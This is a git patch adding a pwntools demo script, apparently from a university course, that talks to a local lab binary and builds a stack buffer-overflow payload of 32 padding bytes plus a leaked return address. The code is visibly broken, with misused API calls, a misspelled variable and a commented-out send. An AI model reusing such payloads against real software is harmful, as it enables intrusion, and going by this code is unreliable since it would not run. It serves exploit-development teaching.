From aa5844585ac8e1dfea65ef579c6aa53971b4eca8 Mon Sep 17 00:00:00 2001
From: Dan Goldsmith <aa9863@coventry.ac.uk>
Date: Sun, 22 Nov 2020 12:57:02 +0000
Subject: [PATCH] Demo of using Pwntools updated

---
 pwnDemo.py | 44 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 pwnDemo.py

diff --git a/pwnDemo.py b/pwnDemo.py
new file mode 100644
index 0000000..53c11ec
--- /dev/null
+++ b/pwnDemo.py
@@ -0,0 +1,44 @@
+from pwn import *
+
+context(os='linux', arch='amd64')
+context.log_level = 'debug'
+
+import logging
+logging.basicConfig(level=logging.DEBUG)
+log = logging.getLogger("PWN")
+
+log.info("Startng process...")
+#And do the Input / output
+p = process("./garbage")  #Change this to the File
+
+p = process.recv_until(">")  #Should get up the the Yes No Prompt
+log.debug(p)
+
+#Reply Yess
+process.writeline("y")
+
+#Get the next lot
+p = process.recv_until("..")
+log.debug(p)
+
+#And the "Data"
+addresses = process.recvuntil('"')
+log.info("---- You need to Process this part ---")
+log.info(addressess)
+
+#Split on space
+parts = addresses.split(" ")
+#Remove brackets
+ADDRESS = parts[0].strip("[").strip("]").strip() #Brackets and whitespace
+
+#And get ready to send the response
+p = process.recv_until(">")
+log.debug(p)
+
+#Build the payload
+OFFSET = 32
+payload = "A"*32
+payload += p64(ADDRESS)
+
+#And Send it
+#p.sendline(payload)